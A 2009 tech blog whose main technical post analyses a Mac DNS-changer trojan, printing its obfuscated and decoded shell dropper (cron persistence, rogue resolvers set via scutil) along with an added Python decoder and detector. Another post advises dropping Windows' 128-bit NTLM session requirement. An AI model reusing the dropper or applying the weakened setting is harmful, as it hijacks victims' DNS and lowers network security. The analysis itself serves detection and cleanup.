Saturday, January 31, 2009

Do Western Digital drives suck or is it just me? Or maybe they don't?

Typical.. as noted I created a nice new system to test Windows 7 and what happens? My 250GB Western Digital drive now thinks its name is

WDC ROM MODEL-HAWK-----

and it is 8 GB. Not that anything can see it anymore. It's still in warranty but without any proof of purchase I definitely won't get squat...

In some countries I could march back in and say it's broken and they'd bend over backwards to help me. We don't really have a customer focus in retail in New Zealand.

We have a law named the Consumer Guarantees Act but you still feel like you're asking someone if you can beat their mother up for even thinking about returning something.

Anyway this drive is broken and there are a lot of hits when you search for the phrase above. Looks like they're not the most reliable things on the planet. So I think I'll give them a wide berth for the moment...

Update a few hours later: I turned everything off for a while (this is usually a 24/7 machine) and the drive is back. Not sure how well, but it seems OK so far. So give that a go if your WD drive goes weird...

Update some 18 months later...

I've had two more Western Digital drives die in the last few months and they were not coming back, no way, no how. So in my eyes Western Digital have some very severe quality issues and I will not be buying any more anytime soon.

So I have two dead drives (both Blue Advanced Format EARS models, if anyone is searching for "western digital dead drives are rubbish"). Fortunately both are backup drives, but I now have no backup, and my main drive is also a Western Digital so it's getting replaced as soon as I can get a new drive. Need to check reliability on other drive brands...

Sunday, January 18, 2009

Windows 7

Well, I had my old drive that I cloned a few months ago just lying there, and I was bored one Saturday morning, so I tried to install Windows 7 to have a play. I wanted to upgrade my old drive but you have to be running Windows to do the upgrade and I had experimented with that Windows installation so much it didn't boot any more. Oh well, clean install. Probably better...

Well..um..I like it. I still think the PC will be running Linux more than any other OS, and I still prefer the look and feel of the Mac, but Windows 7 is pretty good.

It installed easily and the only two glitches were the Cisco VPN client (set the Vista level in the compatibility settings) and the Kaspersky beta AV, which blue-screened (kl1.sys I think it was). I'm running my favorite Avira AntiVir now. That and MalwareBytes get my vote for the best in protection. I found a rogue process on the machine a while back and they were the only two that picked it up. Anyway I digress..

The new default interface is nice. Quite Mac like but still familiar to someone who has used Windows for years. The action center consolidates things nicely to keep things under control.

My old Vampire the Masquerade: Bloodlines ran fine with no compatibility settings needed. All the Steam games ran fine. I got 60 frames on the Half Life Coast test which is quite an improvement from when it was tested with Vista. It just doesn't feel slow and busy like Vista.

It's running Chrome now. My life partner PuTTY just did its thing.

I guess the true test though will be what holes the bad people find in it once it becomes widespread.

Hopefully I can install the release version over the Beta when it's out...

This doesn't happen often but I think you've got it about right Microsoft. Please don't bloat it...

BTW one small change I had to make to get it to talk to the Mac and other Samba boxes was in the Local Security Policy (in Administrative Tools): under Local Policies > Security Options, find the two entries that start "Network security: Minimum session security for NTLM SSP based (including secure RPC)" (one for clients, one for servers) and make them a bit more tolerant. Untick "Require 128-bit encryption" and tick "Require NTLMv2 session security". Dropping the 128-bit requirement is what lets the older Samba builds connect, and it means the session key can be negotiated down to 56-bit, so it's not as secure, but I'm only using it on my LAN and it has two firewalls (not including Windows') between it and the Internet.

Thursday, January 15, 2009

Mac Malware / Trojan

Just today I was telling someone viruses (virii?) weren't an issue on the Mac. OS X is pretty secure, I told him, but you should have AV software to stop you passing on nasties to your Windows friends and colleagues.

Eat my words I did. That afternoon, a phone call from another client. He had a problem with no Internet access on his wireless network but others on the network were OK. First test, try a site by IP. Fine, so it's a DNS issue..

Yes..but so much more. They had a pretty basic router so monitoring was not an option. OK, talk him through opening the terminal and pinging some sites. Takes a while then fails to look it up. OK, let's check /etc/resolv.conf...

nameserver 85.255.114.30
nameserver 85.255.112.152
nameserver 192.168.2.5

Oh crap... two of these were not in the TCP/IP settings. I'll let you work out which two...

Further checking...

nick@host ~ $ host 85.255.114.30
;; connection timed out; no servers could be reached
nick@host ~ $ host 85.255.112.152
Host 152.112.255.85.in-addr.arpa not found: 2(SERVFAIL)
nick@host ~ $ whois 85.255.114.30
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '85.255.112.0 - 85.255.127.255'

inetnum: 85.255.112.0 - 85.255.127.255
netname: UkrTeleGroup
descr: UkrTeleGroup Ltd.
admin-c: UA481-RIPE
tech-c: UA481-RIPE
country: UA
org: ORG-UL25-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: UKRTELE-MNT
mnt-routes: UKRTELE-MNT
mnt-domains: UKRTELE-MNT
source: RIPE # Filtered


Oh crap more... Checked the Startup Items and launchctl but everything looked normal. No processes stood out. How else could it launch? Ah...

Bad-Person-Computer:~ user$ sudo crontab -l
* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1

Smooth... and this file looks like...

more /Library/Internet\ Plug-Ins/QuickTime.xpt
#!/bin/sh
x=`cat "$0" | wc -l | awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" | tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv >1;s1=cx.zxx.aas.wq;s2=cx.zxx.aaz.axz;sh 1 `echo $s1 | tr qazwsxedcr 0123456789` `echo $s2 | tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
ndkf
tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4
q.oynw
uvpx
EOF
)
/voj/obpf/olvxpi << EOF
ndkf
q.pfpx
q.aqq SkjskjAqqjkooko * $1 $2
okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS
uvpx
EOF
kepox=`ljnfxab -i | tjkd QvplgTphk.edx`
pr [ "$kepox" == "" ]; xykf
klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
ljnfxab ljnf.pfox
jh -jr ljnf.pfox
rp
jh -jr "$0"

It even hides itself so you can't just grep for the nameserver addresses: everything after the second line is run through a letter-substitution tr on each execution, and the two addresses are stored with a separate letter-for-digit encoding, so neither the resolver addresses nor strings like scutil or crontab appear in the file as it sits on disk. Roughly translated it gives...

The two encoded tokens on the decoder line expand to the rogue resolvers:

s1=85.255.114.30;s2=85.255.112.152;

and the rest of the file, after the tr pass, is:

#!/bin/sh
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)
/usr/sbin/scutil << EOF
open
d.init
d.add ServerAddresses * $1 $2
set State:/Network/Service/$PSID/DNS
quit
EOF
exist=`crontab -l | grep QuickTime.xpt`
if [ "$exist" == "" ]; then
echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
crontab cron.inst
rm -rf cron.inst
fi
rm -rf "$0"

The decoder writes this plaintext to a file called 1 and runs it as sh 1 with the two addresses as $1 and $2, so the rm -rf "$0" at the end deletes the decoded temporary copy, not the QuickTime.xpt dropper; the cron job then re-runs the dropper every minute and re-applies the resolvers, which is why just fixing the DNS settings doesn't stick. It writes the State: side of the system configuration store (the live settings) rather than the Setup: side the Network preference pane shows, which is why the addresses were in /etc/resolv.conf but not in the TCP/IP settings.
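
The following Python is added here as a worked example; it is not part of the original post and not the trojan's own code. It reverses the two substitutions the dropper uses (both alphabets are copied from its decoder line above), recovers the resolver addresses, and then runs the two checks from earlier in the post, the resolv.conf look and the crontab -l look, over text. The samples are constructed from what is quoted on this page rather than captured live, and the 85.255.112.0/20 range is the inetnum from the whois answer above.

```python
import ipaddress
import re

# Substitution alphabets copied verbatim from the dropper's own decoder line.
TR_FROM = "vdehrujzpbqafwtgkxyilcnos"
TR_TO = "upxmfqrzibdanwgkethlcyosv"
DIGITS_FROM = "qazwsxedcr"
DIGITS_TO = "0123456789"

BODY_TABLE = str.maketrans(TR_FROM, TR_TO)
DIGIT_TABLE = str.maketrans(DIGITS_FROM, DIGITS_TO)

# Constructed samples: fragments of the obfuscated file, the crontab and the
# resolv.conf quoted on this page, not a live capture.
DECODER_LINE = "s1=cx.zxx.aas.wq;s2=cx.zxx.aaz.axz;"
OBFUSCATED_BODY = """#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
kepox=`ljnfxab -i | tjkd QvplgTphk.edx`
pr [ "$kepox" == "" ]; xykf
jh -jr "$0"
"""
SAMPLE_CRONTAB = '* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1\n'
SAMPLE_RESOLV = "nameserver 85.255.114.30\nnameserver 85.255.112.152\nnameserver 192.168.2.5\n"
# inetnum from the whois answer above: 85.255.112.0 - 85.255.127.255
KNOWN_BAD_NET = "85.255.112.0/20"


def decode_body(text):
    """Undo the letter substitution that tr applies to everything after line 2."""
    return text.translate(BODY_TABLE)


def decode_ip(token):
    """Map the dropper's letter-for-digit encoding back to a dotted quad."""
    return token.translate(DIGIT_TABLE)


def extract_dns_servers(decoder_line):
    """Recover the rogue resolver addresses from the s1=...;s2=...; assignments."""
    return [decode_ip(v) for v in re.findall(r"s\d=([a-z.]+);", decoder_line)]


def audit_nameservers(resolv_conf, known_bad=()):
    """Return (ip, reason) for every nameserver that is not on a private range.

    Resolvers inside a known_bad network are reported as the DNS changer's;
    any other public resolver is reported for manual confirmation, because a
    legitimate ISP resolver looks exactly the same in resolv.conf.
    """
    bad_nets = [ipaddress.ip_network(n) for n in known_bad]
    findings = []
    for line in resolv_conf.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0] != "nameserver":
            continue
        try:
            ip = ipaddress.ip_address(parts[1])
        except ValueError:
            findings.append((parts[1], "unparseable nameserver entry"))
            continue
        if ip.is_private:
            continue
        if any(ip in net for net in bad_nets):
            findings.append((str(ip), "known DNS-changer resolver"))
        else:
            findings.append((str(ip), "public resolver, confirm it is your ISP's"))
    return findings


EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+(.+)$")


def cron_indicators(crontab_text):
    """Flag every-minute cron jobs that run something out of Internet Plug-Ins."""
    hits = []
    for line in crontab_text.splitlines():
        m = EVERY_MINUTE.match(line.strip())
        if m and "Internet Plug-Ins" in m.group(1):
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    servers = extract_dns_servers(DECODER_LINE)
    print("rogue resolvers:", servers)
    print(decode_body(OBFUSCATED_BODY))
    # Feed the decoded addresses back in as /32s alongside the whois range.
    for ip, why in audit_nameservers(SAMPLE_RESOLV, [KNOWN_BAD_NET] + servers):
        print(ip, "->", why)
    print("cron persistence:", cron_indicators(SAMPLE_CRONTAB))
```

On a real machine you would feed audit_nameservers the contents of /etc/resolv.conf and cron_indicators the output of sudo crontab -l (for every user, not just root), and treat the "public resolver" finding as a prompt to compare against the ISP's published addresses rather than as proof of infection. Since the dropper writes the State: keys directly, scutil --dns shows what the resolver is really using when the Network preference pane looks clean.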

Simple, but I guess there were nasties just waiting to be picked up from some of the websites this machine was redirected to. Very Mac specific (scutil is the OS X system configuration tool) so not a Linux trojan gone astray. I guess he fell for one of the "download this codec" type trojans and got this little parasite.

So although we don't have virii in the Mac world, little wank stains are out there targeting the Mac using social engineering. I guess you could exploit one of the Safari or Firefox holes or even spoof someone's bank given the recent certificate bypass exploit..

So I guess the times of relying on security through obscurity are over. I'm not sure if this guy has a name but it made my day a lot more interesting!

Friday, January 9, 2009

World Community Grid BOINC not uploading

This one was a bit weird. I run BOINC on one machine and all of a sudden WCG stopped uploading with things like..

[World Community Grid] Scheduler request failed: Peer certificate cannot be authenticated with known CA certificates

or another generic one about SSL error.

Turns out that while playing with some USE flags (Gentoo's build-control options) I had changed curl from using OpenSSL to GnuTLS. No biggie you would have thought, but it just does not work for WCG; the "Peer certificate cannot be authenticated" message is libcurl saying it could not verify the server's certificate against its CA bundle.

Recompiling it against OpenSSL makes it all happy again. So if you see these errors, check that the libcurl line boinc_client prints when it starts lists OpenSSL after the curl version.

This is all for Linux of course :-)

Thursday, January 8, 2009

Oh yeah..Thomson routers

What were you people thinking? Talk about counter-intuitive...

The best solution I found to get these things configured for  a DSL connection was to save the config to a text file and modify it and upload it.

I webbed into the Thomson router and tried to add a PPP connection. Nope, you don't have permission to do that as the admin user. WTF?

So download the config after resetting to factory defaults, add entries with username and password etc. for the PPP connection, upload it, and it works. So how come I can't enter the username and password in the web interface? Grrr

Don't forget to add a default route to go out the PPP interface and it's easy...

Just a weird web interface.

Bring it Cisco

Well..New Zealand is small.  I mean small small...

Cisco have new Integrated Services Routers (the 88x and 86x, to expand on the 87x and 85x range I guess) that do antivirus etc., designed for what is the small office/SOHO market by US/world standards. That sums up about 90% of our clients.

Bring the new toys on here! I can't wait to try new toys from Cisco that are the all-in-one type thing. They supposedly block viruses, bad content, malware etc., so release it first here and we'll test it.

It would be good to have Snort integration to block bot traffic plus any other nasties. So let's hope the Cisco open source relationship can get to that stage....

So one device that plugs into the phone line and the LAN, is a firewall, and does content-level checks for virus, bot etc. traffic. Doing the firewall-from-the-outside thing is easy, but monitoring outbound traffic for telltale signatures or problems would be great.